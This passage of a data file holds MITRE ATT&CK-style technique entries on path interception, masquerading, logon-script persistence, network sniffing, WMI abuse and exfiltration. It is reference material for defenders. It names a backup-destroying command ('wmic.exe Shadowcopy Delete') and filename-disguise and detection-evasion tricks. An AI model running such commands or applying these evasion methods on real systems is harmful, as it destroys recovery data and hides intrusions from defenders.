           'categories': ['persistence', 'privilege-escalation'],
           'description': '**This technique has been deprecated. Please use [Path Interception by PATH Environment '
                          'Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search '
                          'Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception '
                          'by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).**\n'
                          '\n'
                          'Path interception occurs when an executable is placed in a specific path so that it is '
                          'executed by an application instead of the intended target. One example of this was the use '
                          'of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working '
                          'directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess '
                          'function. (Citation: TechNet MS14-019)\n'
                          '\n'
                          'There are multiple distinct weaknesses or misconfigurations that adversaries may take '
                          'advantage of when performing path interception: unquoted paths, path environment variable '
                          'misconfigurations, and search order hijacking. The first vulnerability deals with full '
                          'program paths, while the second and third occur when program paths are not specified. These '
                          'techniques can be used for persistence if executables are called on a regular basis, as '
                          'well as privilege escalation if intercepted executables are started by a higher privileged '
                          'process.\n'
                          '\n'
                          '### Unquoted Paths\n'
                          'Service paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut '
                          'paths are vulnerable to path interception if the path has one or more spaces and is not '
                          'surrounded by quotation marks (e.g., <code>C:\\unsafe path with space\\program.exe</code> '
                          'vs. <code>"C:\\safe path with space\\program.exe"</code>). (Citation: Baggett 2012) An '
                          'adversary can place an executable in a higher level directory of the path, and Windows will '
                          'resolve that executable instead of the intended executable. For example, if the path in a '
                          'shortcut is <code>C:\\program files\\myapp.exe</code>, an adversary may create a program at '
                          '<code>C:\\program.exe</code> that will be run instead of the intended program. (Citation: '
                          'SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan '
                          '2018)\n'
                          '\n'
                          '### PATH Environment Variable Misconfiguration\n'
                          'The PATH environment variable contains a list of directories. Certain methods of executing '
                          'a program (namely using cmd.exe or the command-line) rely solely on the PATH environment '
                          'variable to determine the locations that are searched for a program when the path for the '
                          'program is not given. If any directories are listed in the PATH environment variable before '
                          'the Windows directory, <code>%SystemRoot%\\system32</code> (e.g., '
                          '<code>C:\\Windows\\system32</code>), a program may be placed in the preceding directory '
                          'that is named the same as a Windows program (such as cmd, PowerShell, or Python), which '
                          'will be executed when that command is executed from a script or command-line.\n'
                          '\n'
                          'For example, if <code>C:\\example path</code> precedes <code>C:\\Windows\\system32</code> '
                          'is in the PATH environment variable, a program that is named net.exe and placed in '
                          '<code>C:\\example path</code> will be called instead of the Windows system "net" when "net" '
                          'is executed from the command-line.\n'
                          '\n'
                          '### Search Order Hijacking\n'
                          'Search order hijacking occurs when an adversary abuses the order in which Windows searches '
                          'for programs that are not given a path. The search order differs depending on the method '
                          'that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Hill NT '
                          'Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the '
                          'directory of the initiating program before searching through the Windows system directory. '
                          'An adversary who finds a program vulnerable to search order hijacking (i.e., a program that '
                          'does not specify the path to an executable) may take advantage of this vulnerability by '
                          'creating a program named after the improperly specified program and placing it within the '
                          "initiating program's directory.\n"
                          '\n'
                          'For example, "example.exe" runs "cmd.exe" with the command-line argument <code>net '
                          'user</code>. An adversary may place a program called "net.exe" within the same directory as '
                          'example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, '
                          'if an adversary places a program called "net.com" in the same directory as "net.exe", then '
                          '<code>cmd.exe /C net user</code> will execute "net.com" instead of "net.exe" due to the '
                          'order of executable extensions defined under PATHEXT. (Citation: MSDN Environment '
                          'Property)\n'
                          '\n'
                          'Search order hijacking is also a common practice for hijacking DLL loads and is covered in '
                          '[DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).',
           'name': 'Path Interception',
           'platforms': ['Windows']},
 'T1036': {'attack_id': 'T1036',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may attempt to manipulate features of their artifacts to make them appear '
                          'legitimate or benign to users and/or security tools. Masquerading occurs when the name or '
                          'location of an object, legitimate or malicious, is manipulated or abused for the sake of '
                          'evading defenses and observation. This may include manipulating file metadata, tricking '
                          'users into misidentifying the file type, and giving legitimate task or service names.\n'
                          '\n'
                          'Renaming abusable system utilities to evade security monitoring is also a form of '
                          '[Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)',
           'name': 'Masquerading',
           'platforms': ['Linux', 'macOS', 'Windows', 'Containers']},
 'T1036.001': {'attack_id': 'T1036.001',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may attempt to mimic features of valid code signatures to increase the '
                              'chance of deceiving a user, analyst, or tool. Code signing provides a level of '
                              'authenticity on a binary from the developer and a guarantee that the binary has not '
                              'been tampered with. Adversaries can copy the metadata and signature information from a '
                              'signed program, then use it as a template for an unsigned program. Files with invalid '
                              'code signatures will fail digital signature validation checks, but they may appear more '
                              'legitimate to users and security tools may improperly handle these files.(Citation: '
                              'Threatexpress MetaTwin 2017)\n'
                              '\n'
                              'Unlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity '
                              'will not result in a valid signature.',
               'name': 'Invalid Code Signature',
               'platforms': ['macOS', 'Windows']},
 'T1036.002': {'attack_id': 'T1036.002',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to '
                              'disguise a string and/or file name to make it appear benign. RTLO is a non-printing '
                              'Unicode character that causes the text that follows it to be displayed in reverse. For '
                              'example, a Windows screensaver executable named <code>March 25 \\u202Excod.scr</code> '
                              'will display as <code>March 25 rcs.docx</code>. A JavaScript file named '
                              '<code>photo_high_re\\u202Egnp.js</code> will be displayed as '
                              '<code>photo_high_resj.png</code>.(Citation: Infosecinstitute RTLO Technique)\n'
                              '\n'
                              'Adversaries may abuse the RTLO character as a means of tricking a user into executing '
                              'what they think is a benign file type. A common use of this technique is with '
                              '[Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious '
                              'File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users '
                              'and defenders if they are not aware of how their tools display and render the RTLO '
                              'character. Use of the RTLO character has been seen in many targeted intrusion attempts '
                              'and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber '
                              'Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the '
                              'reversed characters but the command line tool reg.exe does not by default.',
               'name': 'Right-to-Left Override',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1036.003': {'attack_id': 'T1036.003',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may rename legitimate system utilities to try to evade security mechanisms '
                              'concerning the usage of those utilities. Security monitoring and control mechanisms may '
                              'be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS '
                              'Main Site) It may be possible to bypass those security mechanisms by renaming the '
                              'utility prior to utilization (ex: rename <code>rundll32.exe</code>). (Citation: Elastic '
                              'Masquerade Ball) An alternative case occurs when a legitimate utility is copied or '
                              'moved to a different directory and renamed to avoid detections based on system '
                              'utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)',
               'name': 'Rename System Utilities',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1036.004': {'attack_id': 'T1036.004',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may attempt to manipulate the name of a task or service to make it appear '
                              'legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will '
                              'typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: '
                              'Systemd Service Units) Windows services will have a service name as well as a display '
                              'name. Many benign tasks and services exist that have commonly associated names. '
                              'Adversaries may give tasks or services names that are similar or identical to those of '
                              'legitimate ones.\n'
                              '\n'
                              'Tasks or services contain other fields, such as a description, that adversaries may '
                              'attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: '
                              'Fysbis Dr Web Analysis)',
               'name': 'Masquerade Task or Service',
               'platforms': ['Windows', 'Linux', 'macOS']},
 'T1036.005': {'attack_id': 'T1036.005',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may match or approximate the name or location of legitimate files or '
                              'resources when naming/placing them. This is done for the sake of evading defenses and '
                              'observation. This may be done by placing an executable in a commonly trusted directory '
                              '(ex: under System32) or giving it the name of a legitimate, trusted program (ex: '
                              'svchost.exe). In containerized environments, this may also be done by creating a '
                              'resource in a namespace that matches the naming convention of a container pod or '
                              'cluster. Alternatively, a file or container image name given may be a close '
                              'approximation to legitimate programs/images or something innocuous.\n'
                              '\n'
                              'Adversaries may also use the same icon of the file they are trying to mimic.',
               'name': 'Match Legitimate Name or Location',
               'platforms': ['Linux', 'macOS', 'Windows', 'Containers']},
 'T1036.006': {'attack_id': 'T1036.006',
               'categories': ['defense-evasion'],
               'description': "Adversaries can hide a program's true filetype by changing the extension of a file. "
                              'With certain file types (specifically this does not work with .app extensions), '
                              'appending a space to the end of a filename will change how the file is processed by the '
                              'operating system.\n'
                              '\n'
                              'For example, if there is a Mach-O executable file called <code>evil.bin</code>, when it '
                              'is double clicked by a user, it will launch Terminal.app and execute. If this file is '
                              'renamed to <code>evil.txt</code>, then when double clicked by a user, it will launch '
                              'with the default text editing application (not executing the binary). However, if the '
                              'file is renamed to <code>evil.txt </code> (note the space at the end), then when double '
                              'clicked by a user, the true file type is determined by the OS and handled appropriately '
                              'and the binary will be executed (Citation: Mac Backdoors are back).\n'
                              '\n'
                              'Adversaries can use this feature to trick users into double clicking benign-looking '
                              'files of any format and ultimately executing something malicious.',
               'name': 'Space after Filename',
               'platforms': ['Linux', 'macOS']},
 'T1036.007': {'attack_id': 'T1036.007',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse a double extension in the filename as a means of masquerading the '
                              'true file type. A file name may include a secondary file type extension that may cause '
                              'only the first extension to be displayed (ex: <code>File.txt.exe</code> may render in '
                              'some views as just <code>File.txt</code>). However, the second extension is the true '
                              'file type that determines how the file is opened and executed. The real file extension '
                              'may be hidden by the operating system in the file browser (ex: explorer.exe), as well '
                              'as in any software configured using or similar to the system’s policies.(Citation: '
                              'PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension) \n'
                              '\n'
                              'Adversaries may abuse double extensions to attempt to conceal dangerous file types of '
                              'payloads. A very common usage involves tricking a user into opening what they think is '
                              'a benign file type but is actually executable code. Such files often pose as email '
                              'attachments and allow an adversary to gain [Initial '
                              'Access](https://attack.mitre.org/tactics/TA0001) into a user’s system via '
                              '[Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User '
                              'Execution](https://attack.mitre.org/techniques/T1204). For example, an executable file '
                              'attachment named <code>Evil.txt.exe</code> may display as <code>Evil.txt</code> to a '
                              'user. The user may then view it as a benign text file and open it, inadvertently '
                              'executing the hidden malware.(Citation: SOCPrime DoubleExtension)\n'
                              '\n'
                              'Common file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, '
                              'etc.) are typically used as the first extension to appear benign. Executable extensions '
                              'commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the '
                              'second extension and true file type.',
               'name': 'Double File Extension',
               'platforms': ['Windows']},
 'T1036.008': {'attack_id': 'T1036.008',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may masquerade malicious payloads as legitimate files through changes to '
                              "the payload's formatting, including the file’s signature, extension, and contents. "
                              'Various file types have a typical standard format, including how they are encoded and '
                              'organized. For example, a file’s signature (also known as header or magic bytes) is the '
                              'beginning bytes of a file and is often used to identify the file’s type. For example, '
                              'the header of a JPEG file,  is <code> 0xFF 0xD8</code> and the file extension is either '
                              '`.JPE`, `.JPEG` or `.JPG`. \n'
                              '\n'
                              'Adversaries may edit the header’s hex code and/or the file extension of a malicious '
                              'payload in order to bypass file validation checks and/or input sanitization. This '
                              'behavior is commonly used when payload files are transferred (e.g., [Ingress Tool '
                              'Transfer](https://attack.mitre.org/techniques/T1105)) and stored (e.g., [Upload '
                              'Malware](https://attack.mitre.org/techniques/T1608/001)) so that adversaries may move '
                              'their malware without triggering detections. \n'
                              '\n'
                              'Common non-executable file types and extensions, such as text files (`.txt`) and image '
                              'files (`.jpg`, `.gif`, etc.) may be typically treated as benign.  Based on this, '
                              'adversaries may use a file extension to disguise malware, such as naming a PHP backdoor '
                              'code with a file name of <code>test.gif</code>. A user may not know that a file is '
                              'malicious due to the benign appearance and file extension.\n'
                              '\n'
                              'Polygot files, which are files that have multiple different file types and that '
                              'function differently based on the application that will execute them, may also be used '
                              'to disguise malicious malware and capabilities.(Citation: polygot_icedID)',
               'name': 'Masquerade File Type',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1036.009': {'attack_id': 'T1036.009',
               'categories': ['defense-evasion'],
               'description': 'An adversary may attempt to evade process tree-based analysis by modifying executed '
                              "malware's parent process ID (PPID). If endpoint protection software leverages the "
                              '“parent-child" relationship for detection, breaking this relationship could result in '
                              'the adversary’s behavior not being associated with previous process tree activity. On '
                              'Unix-based systems breaking this process tree is common practice for administrators to '
                              'execute software using scripts and programs.(Citation: 3OHA double-fork 2022) \n'
                              '\n'
                              'On Linux systems, adversaries may execute a series of [Native '
                              "API](https://attack.mitre.org/techniques/T1106) calls to alter malware's process tree. "
                              'For example, adversaries can execute their payload without any arguments, call the '
                              '`fork()` API call twice, then have the parent process exit. This creates a grandchild '
                              'process with no parent process that is immediately adopted by the `init` system process '
                              "(PID 1), which successfully disconnects the execution of the adversary's payload from "
                              'its previous process tree.\n'
                              '\n'
                              'Another example is using the “daemon” syscall to detach from the current parent process '
                              'and run in the background.(Citation: Sandfly BPFDoor 2022)(Citation: Microsoft XorDdos '
                              'Linux Stealth 2022) ',
               'name': 'Break Process Trees',
               'platforms': ['Linux', 'macOS']},
 'T1037': {'attack_id': 'T1037',
           'categories': ['persistence', 'privilege-escalation'],
           'description': 'Adversaries may use scripts automatically executed at boot or logon initialization to '
                          'establish persistence.(Citation: Mandiant APT29 Eye Spy Email Nov 22)(Citation: Anomali '
                          'Rocke March 2019) Initialization scripts can be used to perform administrative functions, '
                          'which may often execute other programs or send information to an internal logging server. '
                          'These scripts can vary based on operating system and whether applied locally or '
                          'remotely.  \n'
                          '\n'
                          'Adversaries may use these scripts to maintain persistence on a single system. Depending on '
                          'the access configuration of the logon scripts, either local credentials or an administrator '
                          'account may be necessary. \n'
                          '\n'
                          'An adversary may also be able to escalate their privileges since some boot or logon '
                          'initialization scripts run with higher privileges.',
           'name': 'Boot or Logon Initialization Scripts',
           'platforms': ['macOS', 'Windows', 'Linux', 'Network']},
 'T1037.001': {'attack_id': 'T1037.001',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may use Windows logon scripts automatically executed at logon '
                              'initialization to establish persistence. Windows allows logon scripts to be run '
                              'whenever a specific user or group of users log into a system.(Citation: TechNet Logon '
                              'Scripts) This is done via adding a path to a script to the '
                              '<code>HKCU\\Environment\\UserInitMprLogonScript</code> Registry key.(Citation: Hexacorn '
                              'Logon Scripts)\n'
                              '\n'
                              'Adversaries may use these scripts to maintain persistence on a single system. Depending '
                              'on the access configuration of the logon scripts, either local credentials or an '
                              'administrator account may be necessary. ',
               'name': 'Logon Script (Windows)',
               'platforms': ['Windows']},
 'T1037.002': {'attack_id': 'T1037.002',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may use a Login Hook to establish persistence executed upon user logon. A '
                              'login hook is a plist file that points to a specific script to execute with root '
                              'privileges upon user logon. The plist file is located in the '
                              '<code>/Library/Preferences/com.apple.loginwindow.plist</code> file and can be modified '
                              'using the <code>defaults</code> command-line utility. This behavior is the same for '
                              'logout hooks where a script can be executed upon user logout. All hooks require '
                              'administrator permissions to modify or create hooks.(Citation: Login Scripts Apple '
                              'Dev)(Citation: LoginWindowScripts Apple Dev) \n'
                              '\n'
                              'Adversaries can add or insert a path to a malicious script in the '
                              '<code>com.apple.loginwindow.plist</code> file, using the <code>LoginHook</code> or '
                              '<code>LogoutHook</code> key-value pair. The malicious script is executed upon the next '
                              'user login. If a login hook already exists, adversaries can add additional commands to '
                              'an existing login hook. There can be only one login and logout hook on a system at a '
                              'time.(Citation: S1 macOs Persistence)(Citation: Wardle Persistence Chapter)\n'
                              '\n'
                              '**Note:** Login hooks were deprecated in 10.11 version of macOS in favor of [Launch '
                              'Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch '
                              'Agent](https://attack.mitre.org/techniques/T1543/001) ',
               'name': 'Login Hook',
               'platforms': ['macOS']},
 'T1037.003': {'attack_id': 'T1037.003',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may use network logon scripts automatically executed at logon '
                              'initialization to establish persistence. Network logon scripts can be assigned using '
                              'Active Directory or Group Policy Objects.(Citation: Petri Logon Script AD) These logon '
                              'scripts run with the privileges of the user they are assigned to. Depending on the '
                              'systems within the network, initializing one of these scripts could apply to more than '
                              'one or potentially all systems.  \n'
                              ' \n'
                              'Adversaries may use these scripts to maintain persistence on a network. Depending on '
                              'the access configuration of the logon scripts, either local credentials or an '
                              'administrator account may be necessary.',
               'name': 'Network Logon Script',
               'platforms': ['Windows']},
 'T1037.004': {'attack_id': 'T1037.004',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may establish persistence by modifying RC scripts which are executed during '
                              'a Unix-like system’s startup. These files allow system administrators to map and start '
                              'custom services at startup for different run levels. RC scripts require root privileges '
                              'to modify.\n'
                              '\n'
                              'Adversaries can establish persistence by adding a malicious binary path or shell '
                              'commands to <code>rc.local</code>, <code>rc.common</code>, and other RC scripts '
                              'specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec '
                              '2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the '
                              "script's contents as root, resulting in persistence.\n"
                              '\n'
                              'Adversary abuse of RC scripts is especially effective for lightweight Unix-like '
                              'distributions using the root user as default, such as IoT or embedded '
                              'systems.(Citation: intezer-kaiji-malware)\n'
                              '\n'
                              'Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. '
                              'This is now a deprecated mechanism in macOS in favor of '
                              '[Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer '
                              'Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X '
                              'Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: '
                              'Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, '
                              'such as Ubuntu, will execute the RC scripts if they exist with the correct file '
                              'permissions.(Citation: Ubuntu Manpage systemd rc)',
               'name': 'RC Scripts',
               'platforms': ['macOS', 'Linux', 'Network']},
 'T1037.005': {'attack_id': 'T1037.005',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may use startup items automatically executed at boot initialization to '
                              'establish persistence. Startup items execute during the final phase of the boot process '
                              'and contain shell scripts or other executable files along with configuration '
                              'information used by the system to determine the execution order for all startup '
                              'items.(Citation: Startup Items)\n'
                              '\n'
                              'This is technically a deprecated technology (superseded by [Launch '
                              'Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate '
                              'folder, <code>/Library/StartupItems</code> isn’t guaranteed to exist on the system by '
                              'default, but does appear to exist by default on macOS Sierra. A startup item is a '
                              'directory whose executable and configuration property list (plist), '
                              '<code>StartupParameters.plist</code>, reside in the top-level directory. \n'
                              '\n'
                              'An adversary can create the appropriate folders/files in the StartupItems directory to '
                              'register their own persistence mechanism.(Citation: Methods of Mac Malware Persistence) '
                              'Additionally, since StartupItems run during the bootup phase of macOS, they will run as '
                              'the elevated root user.',
               'name': 'Startup Items',
               'platforms': ['macOS']},
 'T1039': {'attack_id': 'T1039',
           'categories': ['collection'],
           'description': 'Adversaries may search network shares on computers they have compromised to find files of '
                          'interest. Sensitive data can be collected from remote systems via shared network drives '
                          '(host shared directory, network file server, etc.) that are accessible from the current '
                          'system prior to Exfiltration. Interactive command shells may be in use, and common '
                          'functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather '
                          'information.',
           'name': 'Data from Network Shared Drive',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1040': {'attack_id': 'T1040',
           'categories': ['credential-access', 'discovery'],
           'description': 'Adversaries may passively sniff network traffic to capture information about an '
                          'environment, including authentication material passed over the network. Network sniffing '
                          'refers to using the network interface on a system to monitor or capture information sent '
                          'over a wired or wireless connection. An adversary may place a network interface into '
                          'promiscuous mode to passively access data in transit over the network, or use span ports to '
                          'capture a larger amount of data.\n'
                          '\n'
                          'Data captured via this technique may include user credentials, especially those sent over '
                          'an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such '
                          'as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), '
                          'can also be used to capture credentials to websites, proxies, and internal systems by '
                          'redirecting traffic to an adversary.\n'
                          '\n'
                          'Network sniffing may reveal configuration details, such as running services, version '
                          'numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) '
                          'necessary for subsequent [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or '
                          '[Defense Evasion](https://attack.mitre.org/tactics/TA0005) activities. Adversaries may '
                          'likely also utilize network sniffing during '
                          '[Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) (AiTM) to passively '
                          'gain additional knowledge about the environment.\n'
                          '\n'
                          'In cloud-based environments, adversaries may still be able to use traffic mirroring '
                          'services to sniff network traffic from virtual machines. For example, AWS Traffic '
                          'Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances '
                          'to collect traffic from and specified targets to send collected traffic to.(Citation: AWS '
                          'Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) '
                          'Often, much of this traffic will be in cleartext due to the use of TLS termination at the '
                          'load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: '
                          'Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) '
                          'The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account '
                          'in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic '
                          'Mirroring)\n'
                          '\n'
                          'On network devices, adversaries may perform network captures using [Network Device '
                          'CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor '
                          'capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)',
           'name': 'Network Sniffing',
           'platforms': ['Linux', 'macOS', 'Windows', 'Network', 'IaaS']},
 'T1041': {'attack_id': 'T1041',
           'categories': ['exfiltration'],
           'description': 'Adversaries may steal data by exfiltrating it over an existing command and control channel. '
                          'Stolen data is encoded into the normal communications channel using the same protocol as '
                          'command and control communications.',
           'name': 'Exfiltration Over C2 Channel',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1043': {'attack_id': 'T1043',
           'categories': ['command-and-control'],
           'description': '**This technique has been deprecated. Please use [Non-Standard '
                          'Port](https://attack.mitre.org/techniques/T1571) where appropriate.**\n'
                          '\n'
                          'Adversaries may communicate over a commonly used port to bypass firewalls or network '
                          'detection systems and to blend with normal network activity to avoid more detailed '
                          'inspection. They may use commonly open ports such as\n'
                          '\n'
                          '* TCP:80 (HTTP)\n'
                          '* TCP:443 (HTTPS)\n'
                          '* TCP:25 (SMTP)\n'
                          '* TCP/UDP:53 (DNS)\n'
                          '\n'
                          'They may use the protocol associated with the port or a completely different protocol. \n'
                          '\n'
                          'For connections that occur internally within an enclave (such as those between a proxy or '
                          'pivot node and other nodes), examples of common ports are \n'
                          '\n'
                          '* TCP/UDP:135 (RPC)\n'
                          '* TCP/UDP:22 (SSH)\n'
                          '* TCP/UDP:3389 (RDP)',
           'name': 'Commonly Used Port',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1046': {'attack_id': 'T1046',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to get a listing of services running on remote hosts and local '
                          'network infrastructure devices, including those that may be vulnerable to remote software '
                          'exploitation. Common methods to acquire this information include port and/or vulnerability '
                          'scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May '
                          '2021)   \n'
                          '\n'
                          'Within cloud environments, adversaries may attempt to discover services running on other '
                          'cloud hosts. Additionally, if the cloud environment is connected to a on-premises '
                          'environment, adversaries may be able to identify services running on non-cloud systems as '
                          'well.\n'
                          '\n'
                          'Within macOS environments, adversaries may use the native Bonjour application to discover '
                          'services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon '
                          'automatically registers and advertises a host’s registered services on the network. For '
                          'example, adversaries can use a mDNS query (such as <code>dns-sd -B _ssh._tcp .</code>) to '
                          'find other systems broadcasting the ssh service.(Citation: apple doco bonjour '
                          'description)(Citation: macOS APT Activity Bradley)',
           'name': 'Network Service Discovery',
           'platforms': ['Windows', 'IaaS', 'Linux', 'macOS', 'Containers', 'Network']},
 'T1047': {'attack_id': 'T1047',
           'categories': ['execution'],
           'description': 'Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious '
                          'commands and payloads. WMI is designed for programmers and is the infrastructure for '
                          'management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an '
                          'administration feature that provides a uniform environment to access Windows system '
                          'components.\n'
                          '\n'
                          'The WMI service enables both local and remote access, though the latter is facilitated by '
                          '[Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component '
                          'Object Model](https://attack.mitre.org/techniques/T1021/003) and [Windows Remote '
                          'Management](https://attack.mitre.org/techniques/T1021/006).(Citation: WMI 1-3) Remote WMI '
                          'over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when '
                          'using HTTP and 5986 for HTTPS.(Citation: WMI 1-3) (Citation: Mandiant WMI)\n'
                          '\n'
                          'An adversary can use WMI to interact with local and remote systems and use it as a means to '
                          'execute various behaviors, such as gathering information for '
                          '[Discovery](https://attack.mitre.org/tactics/TA0007) as well as '
                          '[Execution](https://attack.mitre.org/tactics/TA0002) of commands and payloads.(Citation: '
                          'Mandiant WMI) For example, `wmic.exe` can be abused by an adversary to delete shadow copies '
                          'with the command `wmic.exe Shadowcopy Delete` (i.e., [Inhibit System '
                          'Recovery](https://attack.mitre.org/techniques/T1490)).(Citation: WMI 6)\n'
                          '\n'
                          '**Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being '
                          '“disabled by default” on Windows 11+. WMIC will be removed from subsequent Windows releases '
                          'and replaced by [PowerShell](https://attack.mitre.org/techniques/T1059/001) as the primary '
                          'WMI interface.(Citation: WMI 7,8) In addition to PowerShell and tools like `wbemtool.exe`, '
                          'COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, '
                          'etc.(Citation: WMI 7,8)',
           'name': 'Windows Management Instrumentation',
           'platforms': ['Windows']},
 'T1048': {'attack_id': 'T1048',
           'categories': ['exfiltration'],
           'description': 'Adversaries may steal data by exfiltrating it over a different protocol than that of the '
                          'existing command and control channel. The data may also be sent to an alternate network '
                          'location from the main command and control server.  \n'
                          '\n'
                          'Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not '
                          'being used as the main command and control channel. Adversaries may also opt to encrypt '
                          'and/or obfuscate these alternate channels. \n'
                          '\n'
                          '[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be '
                          'done using various common operating system utilities such as '
                          '[Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct '
                          '2016) On macOS and Linux <code>curl</code> may be used to invoke protocols such as HTTP/S '
                          'or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques)\n'
                          '\n'
                          'Many IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and '
                          'AWS S3) support the direct download of files, emails, source code, and other sensitive '
                          'information via the web console or [Cloud '
                          'API](https://attack.mitre.org/techniques/T1059/009).',
           'name': 'Exfiltration Over Alternative Protocol',
           'platforms': ['Linux', 'macOS', 'Windows', 'Office 365', 'SaaS', 'IaaS', 'Google Workspace', 'Network']},
 'T1048.001': {'attack_id': 'T1048.001',
               'categories': ['exfiltration'],
               'description': 'Adversaries may steal data by exfiltrating it over a symmetrically encrypted network '
                              'protocol other than that of the existing command and control channel. The data may also '
                              'be sent to an alternate network location from the main command and control server. \n'
                              '\n'
                              'Symmetric encryption algorithms are those that use shared or the same keys/secrets on '
                              'each end of the channel. This requires an exchange or pre-arranged agreement/possession '
                              'of the value used to encrypt and decrypt data. \n'
                              '\n'
                              'Network protocols that use asymmetric encryption often utilize symmetric encryption '
                              'once keys are exchanged, but adversaries may opt to manually share keys and implement '
                              'symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked '
                              'into a protocol. This may result in multiple layers of encryption (in protocols that '
                              'are natively encrypted such as HTTPS) or encryption in protocols that not typically '
                              'encrypted (such as HTTP or FTP). ',
               'name': 'Exfiltration Over Symmetric Encrypted Non-C2 Protocol',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1048.002': {'attack_id': 'T1048.002',
               'categories': ['exfiltration'],
               'description': 'Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network '
                              'protocol other than that of the existing command and control channel. The data may also '
                              'be sent to an alternate network location from the main command and control server. \n'
                              '\n'
                              'Asymmetric encryption algorithms are those that use different keys on each end of the '
                              'channel. Also known as public-key cryptography, this requires pairs of cryptographic '
                              'keys that can encrypt/decrypt data from the corresponding key. Each end of the '
                              'communication channels requires a private key (only in the procession of that entity) '
                              'and the public key of the other entity. The public keys of each entity are exchanged '
                              'before encrypted communications begin. \n'
                              '\n'
                              'Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize '
                              'symmetric encryption once keys are exchanged. Adversaries may opt to use these '
                              'encrypted mechanisms that are baked into a protocol. ',
               'name': 'Exfiltration Over Asymmetric Encrypted Non-C2 Protocol',
               'platforms': ['Linux', 'macOS', 'Windows']},
